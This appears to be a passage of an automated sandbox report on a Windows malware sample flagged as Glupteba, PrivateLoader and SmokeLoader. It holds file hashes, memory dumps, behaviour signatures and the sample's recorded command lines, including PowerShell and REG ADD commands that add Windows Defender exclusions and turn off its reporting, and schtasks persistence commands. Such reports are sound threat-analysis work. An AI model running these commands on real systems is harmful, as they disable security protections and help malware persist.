MD5 4161dc37f51a8abe388ba9020848dd68
SHA1 c0df7765e93ba705aba079209e9a68a098a5e88a
SHA256 0fc7001b509e266c237dd3c1b00d93b0fdb5919bde5d6e180eaee00ac0cbb30b
SHA512 e82cc3163cf52390115477fd1c12277915dc92413a7677a74f9c469571b7e2af9cd8b9064c021b7ec0007de40e557fecc2d57e1858ffd09f9419e7bb64cb004c

\Users\Admin\AppData\Local\Temp\7zSB9DD.tmp\Install.exe

MD5 4161dc37f51a8abe388ba9020848dd68
SHA1 c0df7765e93ba705aba079209e9a68a098a5e88a
SHA256 0fc7001b509e266c237dd3c1b00d93b0fdb5919bde5d6e180eaee00ac0cbb30b
SHA512 e82cc3163cf52390115477fd1c12277915dc92413a7677a74f9c469571b7e2af9cd8b9064c021b7ec0007de40e557fecc2d57e1858ffd09f9419e7bb64cb004c

\Users\Admin\AppData\Local\Temp\7zSB9DD.tmp\Install.exe

MD5 4161dc37f51a8abe388ba9020848dd68
SHA1 c0df7765e93ba705aba079209e9a68a098a5e88a
SHA256 0fc7001b509e266c237dd3c1b00d93b0fdb5919bde5d6e180eaee00ac0cbb30b
SHA512 e82cc3163cf52390115477fd1c12277915dc92413a7677a74f9c469571b7e2af9cd8b9064c021b7ec0007de40e557fecc2d57e1858ffd09f9419e7bb64cb004c

memory/2592-379-0x0000000001FD0000-0x00000000026A5000-memory.dmp

memory/2196-380-0x00000000012D0000-0x00000000019A5000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSB9DD.tmp\Install.exe

MD5 4161dc37f51a8abe388ba9020848dd68
SHA1 c0df7765e93ba705aba079209e9a68a098a5e88a
SHA256 0fc7001b509e266c237dd3c1b00d93b0fdb5919bde5d6e180eaee00ac0cbb30b
SHA512 e82cc3163cf52390115477fd1c12277915dc92413a7677a74f9c469571b7e2af9cd8b9064c021b7ec0007de40e557fecc2d57e1858ffd09f9419e7bb64cb004c

memory/2196-382-0x00000000012D0000-0x00000000019A5000-memory.dmp

C:\Program Files (x86)\OSNMount\OSNMount.exe

MD5 016e672371a4716f6f7b5f14a0d22006
SHA1 5a1a731ec902a26a4f0bb7774e1c25451b9a0f01
SHA256 1328eb253044694b17d4343f4eb000c95a7bfb0c478bc315eec842e7f7a2d8bc
SHA512 7dfceeb44a7d2a7e6c918bffd4c902241ecd4a8f70c81ad0d2fe31a91f05161c25229aafef40c153e13910b0ee4c9214126bd673472bac07ffb2e29668df5110

memory/2032-396-0x0000000004030000-0x0000000004428000-memory.dmp

memory/2196-399-0x0000000000A80000-0x0000000001155000-memory.dmp

memory/2812-395-0x0000000000400000-0x000000000064D000-memory.dmp

memory/2196-383-0x0000000010000000-0x0000000010571000-memory.dmp

memory/2812-381-0x0000000000400000-0x000000000064D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSB9DD.tmp\Install.exe

MD5 4161dc37f51a8abe388ba9020848dd68
SHA1 c0df7765e93ba705aba079209e9a68a098a5e88a
SHA256 0fc7001b509e266c237dd3c1b00d93b0fdb5919bde5d6e180eaee00ac0cbb30b
SHA512 e82cc3163cf52390115477fd1c12277915dc92413a7677a74f9c469571b7e2af9cd8b9064c021b7ec0007de40e557fecc2d57e1858ffd09f9419e7bb64cb004c

memory/2196-401-0x00000000012D0000-0x00000000019A5000-memory.dmp

C:\Program Files (x86)\OSNMount\OSNMount.exe

MD5 016e672371a4716f6f7b5f14a0d22006
SHA1 5a1a731ec902a26a4f0bb7774e1c25451b9a0f01
SHA256 1328eb253044694b17d4343f4eb000c95a7bfb0c478bc315eec842e7f7a2d8bc
SHA512 7dfceeb44a7d2a7e6c918bffd4c902241ecd4a8f70c81ad0d2fe31a91f05161c25229aafef40c153e13910b0ee4c9214126bd673472bac07ffb2e29668df5110

memory/3052-402-0x0000000000400000-0x000000000064D000-memory.dmp

memory/2032-407-0x0000000004430000-0x0000000004D1B000-memory.dmp

memory/2976-408-0x0000000003930000-0x0000000003B7D000-memory.dmp

memory/2912-412-0x0000000000400000-0x0000000002676000-memory.dmp

memory/2028-413-0x0000000000940000-0x0000000000E8D000-memory.dmp

memory/1568-414-0x000000001B210000-0x000000001B4F2000-memory.dmp

memory/1568-419-0x0000000002350000-0x0000000002358000-memory.dmp

memory/1568-429-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

memory/1516-430-0x000000013F620000-0x000000013FB63000-memory.dmp

memory/2032-432-0x0000000000400000-0x0000000002676000-memory.dmp

memory/2912-433-0x0000000000400000-0x0000000002676000-memory.dmp

memory/1568-438-0x0000000002380000-0x0000000002400000-memory.dmp

memory/2808-439-0x0000000000590000-0x00000000005D0000-memory.dmp

memory/1568-440-0x0000000002380000-0x0000000002400000-memory.dmp

memory/2864-442-0x0000000002770000-0x00000000028A1000-memory.dmp

memory/1568-443-0x0000000002380000-0x0000000002400000-memory.dmp

memory/2864-441-0x0000000003010000-0x0000000003181000-memory.dmp

memory/1568-437-0x0000000002380000-0x0000000002400000-memory.dmp

memory/1568-444-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

memory/2032-445-0x0000000000400000-0x0000000002676000-memory.dmp

memory/3052-447-0x0000000000400000-0x000000000064D000-memory.dmp

C:\Users\Admin\Pictures\Eb0NwM2OQwy8SrSKS3OW09gK.exe

MD5 601c7844cdbade71ea487a802b6c6d75
SHA1 921cb88ab70e76e798fed47404193a3f88464d88
SHA256 38a45e6148878dac4c9a72dc779d9d402b1816c6b71e4da314dbfcd533751d3c
SHA512 76a86ac724102ebfe4f1bf017e6627c40ce212f317ef699cf39ae83ab1f2e6fc69b49df36f388c8d9b6f4faa21b3cd81202fa1cbf89e842941c798b7bb3522c4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 dc49d35715d084a376dafc0066a4c3f6
SHA1 e2e954b3e76e64876baff57a8bccc8a4ca7dca53
SHA256 fea8dbaffcadb209cbed605a1aca51419158f11c75571cc7797bea976a637afe
SHA512 76a420b35a2220715f5b29849df001c0dd496d2fed8666576422a0d44b04733e2b6a2bcc5b7248a2c1029b3e71b1ba4596a847312d636fc2db4b74e7037d7f9d

memory/2808-472-0x0000000000590000-0x00000000005D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

C:\Users\Admin\Pictures\7O8fAU20sqOYQEzFUjAPyRvu.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

memory/1516-476-0x000000013F620000-0x000000013FB63000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\Pictures\UFZIn4vmh6DMjXcbkoqqcvoL.exe

MD5 2a11bdca15f3f99d319ef86ddc187bf7
SHA1 24ec21930bed314c15543a5df6ac05c09f919ef1
SHA256 f65464cc8178573d4318c18454658712bc4d922422c3d0d5fab43d2dfe16cd9e
SHA512 b6944388601fe1c234334a58bf2ba452a5e358f08daffab2af21d55df44df387da241ca672cfa265f8b2bafad29bdf943e1b2d65dafc082fb407550580a840b1

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IX3QBB0IJZYBUQYUX3RG.temp

MD5 691708329efd131118e1942745c3b125
SHA1 be5e2a08e3485fb51aea474789964d7a6073d2ec
SHA256 f22e57dbc9adb450fa17d91d8a3a3b7c285d1c2c0793a26ea1f572538e33aa3d
SHA512 97be94bc70e4e865ca4acbfc629148bdc1f83776be6b00c15663713b7ae3d2c7d6ad408acdbe3b6e33678842dc8ae73bbcbde467fe2fc11f2d17ea748ac4bd29

memory/1712-485-0x00000000026F0000-0x00000000026F8000-memory.dmp

memory/2196-484-0x00000000012D0000-0x00000000019A5000-memory.dmp

memory/1712-483-0x000000001B2B0000-0x000000001B592000-memory.dmp

memory/2912-493-0x0000000000400000-0x0000000002676000-memory.dmp

memory/2032-495-0x0000000000400000-0x0000000002676000-memory.dmp

memory/2436-499-0x0000000003FA0000-0x0000000004398000-memory.dmp

memory/2032-505-0x0000000000400000-0x0000000002676000-memory.dmp

memory/1968-515-0x0000000004090000-0x0000000004488000-memory.dmp

memory/2436-514-0x0000000000400000-0x0000000002676000-memory.dmp

memory/1748-516-0x000000013FDE0000-0x0000000140323000-memory.dmp

memory/1128-520-0x0000000004090000-0x0000000004488000-memory.dmp

memory/1968-534-0x0000000000400000-0x0000000002676000-memory.dmp

memory/2976-540-0x0000000000400000-0x00000000004B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

memory/2416-586-0x0000000000230000-0x0000000000250000-memory.dmp

memory/1748-585-0x000000013FDE0000-0x0000000140323000-memory.dmp

memory/3052-587-0x0000000000400000-0x000000000064D000-memory.dmp

memory/1128-594-0x0000000000400000-0x0000000002676000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY\rqBhQmxZHCWBdIf\aEedQxU.exe

MD5 4161dc37f51a8abe388ba9020848dd68
SHA1 c0df7765e93ba705aba079209e9a68a098a5e88a
SHA256 0fc7001b509e266c237dd3c1b00d93b0fdb5919bde5d6e180eaee00ac0cbb30b
SHA512 e82cc3163cf52390115477fd1c12277915dc92413a7677a74f9c469571b7e2af9cd8b9064c021b7ec0007de40e557fecc2d57e1858ffd09f9419e7bb64cb004c

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

memory/1716-610-0x0000000140000000-0x0000000140013000-memory.dmp

memory/2416-611-0x0000000140000000-0x0000000140840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

memory/3052-616-0x0000000000400000-0x000000000064D000-memory.dmp

memory/1128-622-0x0000000000400000-0x0000000002676000-memory.dmp

memory/2416-633-0x0000000140000000-0x0000000140840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

MD5 f801950a962ddba14caaa44bf084b55c
SHA1 7cadc9076121297428442785536ba0df2d4ae996
SHA256 c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f
SHA512 4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-06 14:06

Reported

2023-10-06 14:08

Platform

win10v2004-20230915-en

Max time kernel

77s

Max time network

131s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

PrivateLoader

loader privateloader

SmokeLoader

trojan backdoor smokeloader

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe = "0" C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A

Downloads MZ/PE file

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe = "0" C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4424 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4424 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4424 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4424 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4424 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4424 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4424 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4424 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4424 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4424 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4424 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe

"C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Users\Admin\Pictures\gWmNUi5KAnInwLJ0jNfwJOON.exe

"C:\Users\Admin\Pictures\gWmNUi5KAnInwLJ0jNfwJOON.exe"

C:\Users\Admin\Pictures\nE9EqWiRmQP64KM8Kw99mB7B.exe

"C:\Users\Admin\Pictures\nE9EqWiRmQP64KM8Kw99mB7B.exe"

C:\Users\Admin\Pictures\pGyleBy48sPigxl6BDblZ9bY.exe

"C:\Users\Admin\Pictures\pGyleBy48sPigxl6BDblZ9bY.exe"

C:\Users\Admin\Pictures\3JogIHR6pHlwcUKAOIZEMcTE.exe

"C:\Users\Admin\Pictures\3JogIHR6pHlwcUKAOIZEMcTE.exe"

C:\Users\Admin\AppData\Local\Temp\is-SPEI2.tmp\is-18M67.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SPEI2.tmp\is-18M67.tmp" /SL4 $8020C "C:\Users\Admin\Pictures\pGyleBy48sPigxl6BDblZ9bY.exe" 2846236 52224

C:\Users\Admin\AppData\Local\Temp\is-D5BQP.tmp\_isetup\_setup64.tmp

helper 105 0x404

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\XLgvMgJGOgxCvrgsjoSqFfWx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\XLgvMgJGOgxCvrgsjoSqFfWx.exe" --version

C:\Users\Admin\Pictures\XLgvMgJGOgxCvrgsjoSqFfWx.exe

C:\Users\Admin\Pictures\XLgvMgJGOgxCvrgsjoSqFfWx.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2c4,0x300,0x6d968538,0x6d968548,0x6d968554

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 29

C:\Program Files (x86)\OSNMount\OSNMount.exe

"C:\Program Files (x86)\OSNMount\OSNMount.exe" -s

C:\Users\Admin\Pictures\Z9QDeA1jpkEuc49KxOXq7Glf.exe

"C:\Users\Admin\Pictures\Z9QDeA1jpkEuc49KxOXq7Glf.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /Query /TN "DigitalPulseUpdateTask"

C:\Users\Admin\AppData\Local\Temp\7zSD4F3.tmp\Install.exe

.\Install.exe

C:\Windows\system32\schtasks.exe

"schtasks" /Create /TN "DigitalPulseUpdateTask" /SC HOURLY /TR "C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseUpdate.exe"

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

"C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe" 5333:::clickId=:::srcId=

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Users\Admin\AppData\Local\Temp\7zSDA33.tmp\Install.exe

.\Install.exe /DdidCJjeH "385120" /S

C:\Users\Admin\Pictures\0jyPoep2iLwbFR5el0WC2cG2.exe

"C:\Users\Admin\Pictures\0jyPoep2iLwbFR5el0WC2cG2.exe"

C:\Program Files (x86)\OSNMount\OSNMount.exe

"C:\Program Files (x86)\OSNMount\OSNMount.exe" -i

C:\Users\Admin\Pictures\XLgvMgJGOgxCvrgsjoSqFfWx.exe

